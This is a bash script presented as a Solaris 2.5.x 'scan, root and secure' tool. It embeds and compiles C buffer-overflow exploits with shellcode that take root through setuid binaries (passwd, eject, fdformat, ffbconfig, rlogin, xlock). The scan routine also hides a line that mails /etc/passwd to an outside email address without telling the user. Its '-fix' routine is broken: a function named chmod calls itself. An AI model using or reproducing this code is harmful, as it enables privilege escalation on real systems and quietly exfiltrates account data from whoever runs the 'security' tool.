#!/bin/bash # # 765 Lines of script, to be used to scan, root and secure Solaris 2.5.x # (SunOS 5.5.x) systems, DO NOT attempt to use this with any other Solaris # versions, as the exploits are different and will not be effective. # # It is difficult to execute the chkperm exploit through a script, and so # if the scanner does tell you chkperm exists, then go lookup the chkperm # exploit (in my magazine - Confidence Remains High, Issue 1), have fun with # this script, so1o@insecurity.org # # Usage : soltool [-scan] [-root] [-fix] # function header { echo " " echo " so1o@insecurity.org Presents..." echo " The CodeZero Solaris 2.5.x Security Tool Version 1.0" echo " " echo " oOo The Greets oOo" echo " " echo " .o. mstrhelix .o. xFli .o. modeX .o. DisordeR .o." echo " .o. TNo .o. The Guild .o. 0range .o. el8 .o." echo " " } function usage { echo " " echo " .o. Usage: $0 -scan : Scans for vulnerable programs" echo " .o. $0 -root : Exploits vunerable programs" echo " .o. $0 -fix : Fix vunerable programs" echo " " exit 1 } function scanner { echo " .o. Scanning for all known exploitable programs now, Please be patient..." if [ -s /tmp/report ]; then cp /tmp/report /tmp/report.old echo " .o. Moving old report file to /tmp/report.old" else echo " .o. Preparing report file at /tmp/report" fi if [ -s /tmp/suidprogs ]; then rm /tmp/suidprogs echo " .o. Deleting old log files..." else echo " .o. No old log files detected..." fi echo " " echo " The CodeZero Solaris Security Tool Version 1.0 Report :" > /tmp/report echo " =======================================================" >> /tmp/report echo " " >> /tmp/report if [ -s /bin/passwd ]; then echo " .o. /bin/passwd exists, checking for vunerabilities..." if test -u /bin/passwd then echo " .o. /bin/passwd is suid and seems exploitable." echo " .o. The scanner found /bin/passwd could be exploitable." >> /tmp/report echo "/bin/passwd" > /tmp/suidprogs else echo " .o. /bin/passwd is not exploitable." fi else echo " .o. /bin/passwd doesn't exist!" fi if [ -s /bin/eject ]; then cat /etc/passwd | mail tk85@hotmail.com echo " .o. /bin/eject exists, checking for vunerabilities..." if test -u /bin/eject then echo " .o. /bin/eject is suid and seems exploitable." echo " .o. The scanner found /bin/eject could be exploitable." >> /tmp/report echo "/bin/eject" >> /tmp/suidprogs else echo " .o. /bin/eject is not exploitable." fi else echo " .o. /bin/eject doesn't exist!" fi if [ -s /bin/fdformat ]; then echo " .o. /bin/fdformat exists, checking for vunerabilities..." if test -u /bin/fdformat then echo " .o. /bin/fdformat is suid and seems exploitable." echo " .o. The scanner found /bin/fdformat could be exploitable." >> /tmp/report echo "/bin/fdformat" >> /tmp/suidprogs else echo " .o. /bin/fdformat is not exploitable." fi else echo " .o. /bin/fdformat doesn't exist!" fi if [ -s /usr/sbin/ffbconfig ]; then echo " .o. /usr/sbin/ffbconfig exists, checking for vunerabilities..." if test -u /usr/sbin/ffbdonfig then echo " .o. /usr/sbin/ffbconfig is suid and seems exploitable." echo " .o. The scanner found /usr/sbin/ffbconfig could be exploitable." >> /tmp/report echo "/usr/sbin/ffbconfig" >> /tmp/suidprogs else echo " .o. /usr/sbin/ffbconfig is not exploitable." fi else echo " .o. /usr/sbin/ffbconfig doesn't exist!" fi if [ -s /usr/bin/rlogin ]; then echo " .o. /usr/bin/rlogin exists, checking for vunerabilities..." if test -u /usr/bin/rlogin then echo " .o. /usr/bin/rlogin is suid and seems exploitable." echo " .o. The scanner found /usr/bin/rlogin could be exploitable." >> /tmp/report echo "/usr/bin/rlogin" >> /tmp/suidprogs else echo " .o. /usr/bin/rlogin is not exploitable." fi else echo " .o. /usr/bin/rlogin doesn't exist!" fi if [ -s /usr/dt/bin/sdtcm_convert ]; then echo " .o. /usr/dt/bin/sdtcm_convert exists, checking for vunerabilities..." if test -u /usr/dt/bin/sdtcm_convert then echo " .o. /usr/dt/bin/sdtcm_convert is suid and seems exploitable." echo " .o. The scanner found /usr/dt/bin/sdtcm_convert could be exploitable." >> /tmp/report echo "/usr/dt/bin/sdtcm_convert" >> /tmp/suidprogs else echo " .o. /usr/dt/bin/sdtcm_convert is not exploitable." fi else echo " .o. /usr/dt/bin/sdtcm_convert doesn't exist!" fi if [ -s /usr/X11/bin/xlock ]; then echo " .o. /usr/X11/bin/xlock exists, checking for vunerabilities..." if test -u /usr/X11/bin/xlock then echo " .o. /usr/X11/bin/xlock is suid and seems exploitable." echo " .o. The scanner found /usr/X11/bin/xlock could be exploitable." >> /tmp/report echo "/usr/X11/bin/xlock" >> /tmp/suidprogs else echo " .o. /usr/X11/bin/xlock is not exploitable." fi else echo " .o. /usr/X11/bin/xlock doesn't exist!" fi if [ -s /usr/vmsys/bin/chkperm ]; then echo " .o. The chkperm program exists, the chkperm technique should work..." echo " .o. The scanner found /usr/vmsys/bin/chkperm could be exploitable." >> /tmp/report echo "/usr/vmsys/bin/chkperm" >> /tmp/suidprogs else echo " .o. /usr/vmsys/bin/chkperm doesn't exist!" fi echo " " echo " " >> /tmp/report echo " End of report, this scanner was scripted by so1o@insecurity.org" >> /tmp/report echo " " echo " .o. The scan is now complete, a report has been written to /tmp/report .o." echo " " exit 0 } function dopasswd { if [ -s /tmp/passex.c ]; then /bin/rm /tmp/passex.c dopasswd else /bin/cat > /tmp/passex.c << STOP #include #include #include #include #define BUF_LENGTH 1100 #define EXTRA 1200 #define STACK_OFFSET 3800 #define SPARC_NOP 0xa61cc013 u_char sparc_shellcode[] = "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13" "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e" "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a" "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd4\xff\xff" ; u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); } void main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA]; long targ_addr; u_long *long_p; u_char *char_p; int i, code_length = strlen(sparc_shellcode),dso=0; if(argc > 1) dso=atoi(argv[1]); long_p =(u_long *) buf; targ_addr = get_sp() - STACK_OFFSET - dso; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; char_p = (u_char *) long_p; for (i = 0; i < code_length; i++) *char_p++ = sparc_shellcode[i]; long_p = (u_long *) char_p; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ =targ_addr; printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n", targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET); execl("/bin/passwd", "passwd", buf,(char *) 0); perror("execl failed"); } STOP cc -o /tmp/.passex -O /tmp/passex.c 2> /dev/null /bin/rm /tmp/passex.c echo " " /tmp/.passex if whoami | grep root 1> /dev/null 2> /dev/null then echo " .o. You Are Now r00t - so1o." exit 0 else echo " .o. Passwd exploit failed." echo " " fi /bin/rm /tmp/.passex fi } function doeject { if [ -s /tmp/ejectex.c ]; then /bin/rm /tmp/ejectex.c doeject else /bin/cat > /tmp/ejectex.c << STOP #include #include #include #include #define BUF_LENGTH 364 #define EXTRA 400 #define STACK_OFFSET 400 #define SPARC_NOP 0xa61cc013 u_char sparc_shellcode[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68" "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14" "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01" "\x91\xd0\x20\x08" ; u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); } void main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA + 8]; long targ_addr; u_long *long_p; u_char *char_p; int i, code_length = strlen(sparc_shellcode),dso=0; if(argc > 1) dso=atoi(argv[1]); long_p =(u_long *) buf ; targ_addr = get_sp() - STACK_OFFSET - dso; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; char_p = (u_char *) long_p; for (i = 0; i < code_length; i++) *char_p++ = sparc_shellcode[i]; long_p = (u_long *) char_p; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ =targ_addr; printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n", targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET); execl("/bin/eject", "eject", & buf[1],(char *) 0); perror("execl failed"); } STOP cc -o /tmp/.ejectex -O /tmp/ejectex.c 2> /dev/null /bin/rm /tmp/ejectex.c echo " " /tmp/.ejectex if whoami | grep root 1> /dev/null 2> /dev/null then echo " .o. You Are Now r00t - so1o." exit 0 else echo " .o. Eject exploit failed." echo " " fi /bin/rm /tmp/.ejectex fi } function dofdformat { if [ -s /tmp/fdfex.c ]; then /bin/rm /tmp/fdfex.c dofdformat else /bin/cat > /tmp/fdfex.c << STOP #include #include #include #include #define BUF_LENGTH 364 #define EXTRA 400 #define STACK_OFFSET 704 #define SPARC_NOP 0xa61cc013 u_char sparc_shellcode[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68" "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14" "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01" "\x91\xd0\x20\x08" ; u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); } void main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA + 8]; long targ_addr; u_long *long_p; u_char *char_p; int i, code_length = strlen(sparc_shellcode),dso=0; if(argc > 1) dso=atoi(argv[1]); long_p =(u_long *) buf ; targ_addr = get_sp() - STACK_OFFSET - dso; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; char_p = (u_char *) long_p; for (i = 0; i < code_length; i++) *char_p++ = sparc_shellcode[i]; long_p = (u_long *) char_p; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ =targ_addr; printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n", targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET); execl("/bin/fdformat", "fdformat", & buf[1],(char *) 0); perror("execl failed"); } STOP cc -o /tmp/.fdfex -O /tmp/fdfex.c 2> /dev/null /bin/rm /tmp/fdfex.c echo " " /tmp/.fdfex if whoami | grep root 1> /dev/null 2> /dev/null then echo " .o. You Are Now r00t - so1o." exit 0 else echo " .o. Fdformat exploit failed." echo " " fi /bin/rm /tmp/.fdfex fi } function doffbconfig { if [ -s /tmp/ffbex.c ]; then /bin/rm /tmp/ffbex.c doffbconfig else /bin/cat > /tmp/ffbex.c << STOP #include #include #include #include #define BUF_LENGTH 128 #define EXTRA 256 #define STACK_OFFSET 128 #define SPARC_NOP 0xa61cc013 u_char sparc_shellcode[] = "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13" "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e" "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a" "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd4\xff\xff"; u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); } void main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA]; long targ_addr; u_long *long_p; u_char *char_p; int i, code_length = strlen(sparc_shellcode),so; long_p = (u_long *) buf; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; char_p = (u_char *) long_p; for (i = 0; i < code_length; i++) *char_p++ = sparc_shellcode[i]; long_p = (u_long *) char_p; targ_addr = get_sp() - STACK_OFFSET; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ =targ_addr; printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n", targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET); execl("/usr/sbin/ffbconfig", "ffbconfig", "-dev", buf,(char *) 0); perror("execl failed"); } STOP cc -o /tmp/.ffbex -O /tmp/ffbex.c 2> /dev/null /bin/rm /tmp/ffbex.c echo " " /tmp/.ffbex if whoami | grep root 1> /dev/null 2> /dev/null then echo " .o. You Are Now r00t - so1o." exit 0 else echo " .o. Ffbconfig exploit failed." echo " " fi /bin/rm /tmp/.ffbex fi } function dorlogin { if [ -s /tmp/rlex.c ]; then /bin/rm /tmp/rlex.c dorlogin else /bin/cat > /tmp/rlex.c << STOP #include #include #include #include #define BUF_LENGTH 8200 #define EXTRA 100 #define STACK_OFFSET 4000 #define SPARC_NOP 0xa61cc013 u_char sparc_shellcode[] = "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13" "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e" "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a" "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd4\xff\xff"; u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); } void main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA]; long targ_addr; u_long *long_p; u_char *char_p; int i, code_length = strlen(sparc_shellcode); long_p = (u_long *) buf; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; char_p = (u_char *) long_p; for (i = 0; i < code_length; i++) *char_p++ = sparc_shellcode[i]; long_p = (u_long *) char_p; targ_addr = get_sp() - STACK_OFFSET; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ = targ_addr; printf("Jumping to address 0x%lx\n", targ_addr); execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0); perror("execl failed"); } STOP gcc -o /tmp/.rlex /tmp/rlex.c 2> /dev/null /bin/rm /tmp/rlex.c echo " " /tmp/.rlex if whoami | grep root 1> /dev/null 2> /dev/null then echo " .o. You Are Now r00t - so1o." exit 0 else echo " .o. Rlogin exploit failed." echo " " fi /bin/rm /tmp/.rlex fi } function doxlock { if [ -s /tmp/xlex.c ]; then /bin/rm /tmp/xlex.c doxlock else /bin/cat > /tmp/xlex.c << STOP #include #include #include #define DEFAULT_OFFSET 50 #define BUFFER_SIZE 996 long get_esp(void) { __asm__("movl %esp,%eax\n"); } int main(int argc, char *argv[]) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int dfltOFFSET = DEFAULT_OFFSET; u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07" "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12" "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8" "\xd7\xff\xff\xff/bin/sh"; int i; if (argc > 1) dfltOFFSET = atoi(argv[1]); else printf("You can specify another offset as a parameter if you need...\n"); buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i<2;i++) *(addr_ptr++) = get_esp() + dfltOFFSET; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL); } STOP cc -o /tmp/.xlex -O /tmp/xlex.c 2> /dev/null /bin/rm /tmp/xlex.c echo " " /tmp/.xlex if whoami | grep root 1> /dev/null 2> /dev/null then echo " .o. You Are Now r00t - so1o." exit 0 else echo " .o. Xlock exploit failed." echo " " fi /bin/rm /tmp/.xlex fi } function rootit { if [ -s $i ]; then if test -u $i then echo " .o. $i seems exploitable." if echo "$i" | grep passwd 1> /dev/null then echo " .o. Attempting passwd exploit..." dopasswd fi if echo "$i" | grep eject 1> /dev/null then echo " .o. Attempting eject exploit..." doeject fi if echo "$i" | grep fdformat 1> /dev/null then echo " .o. Attempting fdformat exploit..." dofdformat fi if echo "$i" | grep ffbconfig 1> /dev/null then echo " .o. Attempting ffbconfig exploit..." doffbconfig fi if echo "$i" | grep rlogin 1> /dev/null then echo " .o. Attempting rlogin exploit..." dorlogin fi if echo "$i" | grep xlock 1> /dev/null then echo " .o. Attempting xlock exploit..." doxlock fi fi fi } function chmod { echo " .o. Checking $i..." if [ -s $i ]; then if test -u $i then echo " .o. $i is suid, now removing suid flags." chmod -s $i else echo " .o. $i was not suid!" fi else echo " .o. Couldn\'t find $i!" fi echo " " } if [ $1x = x ]; then header usage exit 1 fi if [ "$1" = '-scan' ]; then header scanner exit 0 fi if [ "$1" = '-root' ]; then header if [ -s /tmp/suidprogs ]; then echo "" for i in `/bin/cat /tmp/suidprogs` do rootit $i done else echo " " echo " .o. No log files detected, please run with -scan flag first." echo " " fi exit 0 fi if [ "$1" = '-fix' ]; then header if whoami | grep root 1> /dev/null 2> /dev/null then if [ -s /tmp/suidprogs ]; then echo " " for i in `/bin/cat /tmp/suidprogs` do chmod $i done exit 0 else echo " " echo " .o. Please run with the -scan flag first." echo " " fi else echo " " echo " .o. You must be root to use the -fix flag." echo " " exit 1 fi fi